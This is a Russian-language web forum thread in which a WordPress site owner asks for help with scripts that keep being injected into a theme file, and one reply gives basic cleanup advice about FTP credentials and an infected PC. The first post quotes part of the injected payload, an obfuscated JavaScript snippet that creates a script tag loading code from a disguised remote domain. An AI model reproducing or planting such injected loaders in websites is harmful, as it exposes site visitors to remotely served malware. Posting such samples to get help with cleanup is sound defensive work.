![]() |
|
![]() ![]() ![]() |
|
Pitbul |
|
|||
![]() Fruzenshtein ![]() Профиль Группа: Участник Сообщений: 231 Регистрация: 30.4.2008 Где: Киев Репутация: нет Всего: нет |
Специалисты, помогите пожалуйста с решением ПРОБЛЕМЫ:
Каждые 5-8 часов падает сайт (на WordPress): Parse error: syntax error, unexpected '<' in /home/gamestore/domains/gamehouse.com.ua/public_html/wp-includes/default-widgets.php on line 1031 Причиной является не мое "ковыряние" в коде, а вот эти скрипты, которые появляются не знаю откуда: <script>/*GNU GPL*/ try{window.onload = function(){var Wwqwjnm8cqv1nhv = document.createElement('s#((c&&^^r@!i^@!p)&t$$^'.replace(/\(|\^|\!|&|#|@|\$|\)/ig, ''));Wwqwjnm8cqv1nhv.setAttribute('type', 'text/javascript');Wwqwjnm8cqv1nhv.setAttribute('src', 'h!(^t@^@t$!p!(:&(!/$(/!)(n&$a!)v&(&e&$r!!-(&c#)(#o&)#m)#&.$#s@k)y)^)r$o@c$^@^k).((!c$o#m#.)m(s#!!(n!#-@@c&^(o&&m&-@c@(^n$^#&.@(!#m$u&s@#!i&c#b)&o!$)x&&&p))r#@!$)o#^.&^r^($u) ![]() Я уже и проверил ПК на наличие вирусов с помощью КАСПЕРЫЧА - выявил 26 червей и удалил их, затем заменил ПАСС к FTP - но все равно это повторилось ![]() ![]() ![]() Использую FTP клиент - FileZilla Подскажите что с этим делать??? ![]() ![]() ![]() --------------------
### JAVA ###### programming ### |
|||
|
||||
Сумасшедший |
|
|||
Чилавек-Каропка ![]() ![]() ![]() Профиль Группа: Завсегдатай Сообщений: 1503 Регистрация: 15.8.2004 Где: Москва Репутация: 13 Всего: 107 |
Попробуйте все работы с фтп выполнить на совсем другом компьютере, проверить обновления wp, потом сменить пасс на фтп - и не заходить какое-то время с того компьютера, где были черви - вполне компьютер может оказаться недочищенным
-------------------- Однажды ты спросишь, а я отвечу: "Время ожидания специалиста - 10 минут". Ты бросишь трубку, так и не узнав, что Ваш звонок очень важен для нас! |
|||
|
||||
![]() ![]() ![]() |
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей) | |
0 Пользователей: | |
« Предыдущая тема | Администрирование Web серверов и Web служб | Следующая тема » |
|
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности Powered by Invision Power Board(R) 1.3 © 2003 IPS, Inc. |